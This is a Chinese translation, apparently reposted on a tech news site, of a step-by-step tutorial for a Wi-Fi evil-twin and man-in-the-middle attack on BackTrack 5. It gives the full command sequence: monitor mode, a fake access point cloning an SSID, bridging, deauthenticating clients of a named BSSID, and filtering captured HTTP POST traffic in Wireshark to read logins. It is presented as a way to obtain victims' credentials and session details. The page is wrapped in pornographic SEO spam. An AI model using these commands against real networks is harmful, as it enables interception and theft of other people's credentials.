成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

BT5 + wireshark玩wifi捕獲和中間人攻擊

安全 黑客攻防
主要思路是通過偽造相同名稱的wifi接入點,配合發送ARP數據包,攻擊連入偽造wifi的用戶。一個與原有wifi相同名稱的偽造接入點一旦建立,會導致用戶從原有鏈接中斷開,并連入你所建立的偽造接入點中,因此所有的通信通道都會流經我的系統,屆時我們通常會用session注入的方式拿到用戶所有的細節/授信狀態/信息等。

前言:先說明一下,這個文章不是我寫的,是一個老外(Deepanshu Kapoor)安全專家寫的,我一開始就是看著玩,但整個看完被老外那個細心和耐心給打動了,整個過程其實很簡單,但是老外分了好多步驟來講解,每個步驟都有配圖和說明,甚至命令的參數都要解釋一下。不得不佩服老外分享和奉獻的精神,所以我也學著奉獻一下,把它翻譯成中文給大家看看吧,我盡量保持原汁原味,有不恰當的地方要原諒我,畢竟我不是專業翻譯。

[[112768]]

BT5 + wireshark玩wifi數據包捕獲和session注入(中間人攻擊)

介紹:

主要思路是通過偽造相同名稱的wifi接入點,配合發送ARP數據包,攻擊連入偽造wifi的用戶。一個與原有wifi相同名稱的偽造接入點一旦建立,會導致用戶從原有鏈接中斷開,并連入你所建立的偽造接入點中,因此所有的通信通道都會流經我的系統,屆時我們通常會用session注入的方式拿到用戶所有的細節/授信狀態/信息等。

必備神器:

1,BT5(Backtrack操作系統)

2,虛擬機(帶USB設備)

3,可聯網的主機

第一步:

開BT5的terminal終端,然后輸入”iwconfig” 檢查無線網卡。

說明:iwconfig類似于ifconfig,但是是用于無線網絡的。它經常被用來設置無線網卡的參數。

BT5 + wireshark玩wifi數據包捕獲和session注入(中間人攻擊)

第二步:

輸入“airmon-ng start wlan0”開啟無線網卡。

說明:這個命令可以被用來讓無線網卡處于監聽狀態。也可以被用來從監聽模式中恢復成管理模式。輸入 “airmon-ng”不帶參數,可以顯示網卡狀態。

wlan0 是指wifi網卡。

wlan 是無線局域網, 0 是你的網卡編號。

BT5 + wireshark玩wifi數據包捕獲和session注入(中間人攻擊)

第三步:

在網卡已經啟動了監聽模式后,輸入“airodump-ng mon0”就可以開始抓包了。

說明:airodump-ng 可以用來抓802.11的原始幀數據包,特別適合于收集WEP的初始化向量用于aircrack-ng的破解。Airodump-ng也能夠用來記錄找到的接入點的坐標。

mon0在監聽模式下和wlan0的意思是一樣的。

一旦你把wlan0設置為監聽模式,wlan0就要改為mon0。

BT5 + wireshark玩wifi數據包捕獲和session注入(中間人攻擊)

第四步:

設置在airodump-ng中顯示的頻道ID,命令如下:

“iwconfig mon0 channel 5” “iwconfig wlan0 channel 5”

或者

“iwconfig wlan0 channel 5” “iwconfig mon0 channel 5”

說明:參數“channel”用來選定一個單獨的特殊頻道。

BT5 + wireshark玩wifi數據包捕獲和session注入(中間人攻擊)

第五步:

現在開始建立你的偽造路由器,命令如下:

“airbase-ng - e “belkin.3448” mon0”

說明:airbase-ng是個多用途的工具,可針對AP(接入點)自身的客戶端進行攻擊,主要的思路是驅使客戶端去連接偽造的AP,不是阻止客戶端去連接真實AP。

“-e + SSID”指定偽造AP的SSID名稱。

BT5 + wireshark玩wifi數據包捕獲和session注入(中間人攻擊)

第六步:

現在是時候去“橋接”所有的網絡了,命令如下:

“brctl addbr mitm”

“brctl addif mitm eth0”

“brctl addif mitm at0”

中間人就是 。(這句話看原文直接翻譯有些難以理解,實際上作者就是想說at0這個網卡架起來的網橋就是個中間人,攻擊就是在這里完成的。—–譯者注)

說明:

Brctl 用來在兩個網卡之間建立橋接網絡。

Addbr 用來添加網橋的對象,用來指定網橋的名稱。

Addif 給已經使用addbr創建的網橋中添加一個網卡,后邊的參數使用你要添加的網卡名稱即可。

BT5 + wireshark玩wifi數據包捕獲和session注入(中間人攻擊)

第七步:

現在創建一個新的網卡配置,命令如下:

“ifconfig eth0 0.0.0.0 up”

“ifconfig at0 0.0.0.0 up”

說明:ifconfig 不用多說了,用來配置網卡,大家經常用的。

BT5 + wireshark玩wifi數據包捕獲和session注入(中間人攻擊)

第八步:

現在可以啟動我們用來做中間人攻擊的網橋了!命令如下:

“ifconfig mitm up”

說明:配置完成的網橋可以使用ifconfig來啟用。

BT5 + wireshark玩wifi數據包捕獲和session注入(中間人攻擊)

第九步:

現在使用下面的命令發送認證包到路由器上,

“aireplay-ng - - deauth 0 - a 94:44:52:DA:B4:28 mon0”

說明:aireplay-ng 用來注入幀數據。

-a 指定被攻擊者的BSSID。

94:44:52:DA:B4:28這個是被攻擊者的BSSID。

BT5 + wireshark玩wifi捕獲和中間人攻擊

第十步:

現在開始給被攻擊者分配IP,命令如下:

“dhclient3 mitm&” 或者 “dhclient3 mitm &”

說明:

使用類似DHCP的協議方式分配IP。

BT5 + wireshark玩wifi捕獲和中間人攻擊

第十一步:

現在你可以看看是不是有客戶端已經連接上了,有的話會顯示在第五步的那個命令終端里面。

BT5 + wireshark玩wifi捕獲和中間人攻擊

第十二步:

開wireshark,命令:“wireshark&”

說明:wireshark是個網絡協議抓包分析器。

BT5 + wireshark玩wifi捕獲和中間人攻擊

第十三步:

選擇網卡,點開始(start)

BT5 + wireshark玩wifi捕獲和中間人攻擊

第十四步:

輸入 “http contains POST”過濾一下,然后你就可以看到所有抓下來的數據包了。

BT5 + wireshark玩wifi捕獲和中間人攻擊

http://exploit.deepanshukapoor.org/admin.php

Username – john

Password – 1234

BT5 + wireshark玩wifi捕獲和中間人攻擊

 

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2015-01-05 13:29:37

2014-03-17 09:16:08

2013-11-11 10:36:04

2019-01-28 08:59:59

2020-05-07 15:24:22

中間人攻擊MITM

2017-02-16 08:53:42

2012-11-20 13:06:57

2014-05-15 10:20:07

2014-03-20 10:26:58

2015-12-29 10:41:16

2009-08-14 11:25:38

2014-11-21 11:46:55

2010-09-25 14:50:34

2016-09-27 22:45:47

2010-06-13 12:06:41

2014-11-25 09:17:53

2021-07-26 05:22:47

中間人攻擊加密網絡安全

2014-06-03 16:30:53

2014-06-06 14:12:40

2014-10-21 13:17:05

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: a成人| 国产精品久久久久久久久免费高清 | 999精品在线 | 成人欧美一区二区 | 精品九九九 | 羞羞视频网站免费观看 | 天天综合国产 | 亚洲精品www久久久久久广东 | 免费成人在线网站 | 精品国产鲁一鲁一区二区张丽 | 涩爱av一区二区三区 | 成年精品 | 欧美网站一区二区 | 91看片免费版 | 中文字幕亚洲区一区二 | 一区二区国产精品 | 四虎永久 | 国产网站在线播放 | 精品亚洲二区 | 亚洲午夜精品一区二区三区他趣 | 久久久一区二区三区 | 免费在线观看黄网站 | 成人综合伊人 | 成人a视频| 欧美日韩不卡合集视频 | 色婷婷久久久亚洲一区二区三区 | 伊人网在线看 | 中文字幕在线观看www | 成人毛片一区二区三区 | 自拍偷拍一区二区三区 | 在线播放亚洲 | 二区在线观看 | 亚洲欧洲精品一区 | 午夜久久久久久久久久一区二区 | 国产中文区二幕区2012 | 欧美一区二区大片 | 亚洲一区二区在线 | 亚洲国产成人在线观看 | 伊人一二三 | 国产欧美一区二区三区在线看蜜臀 | 久久久国产精品一区 |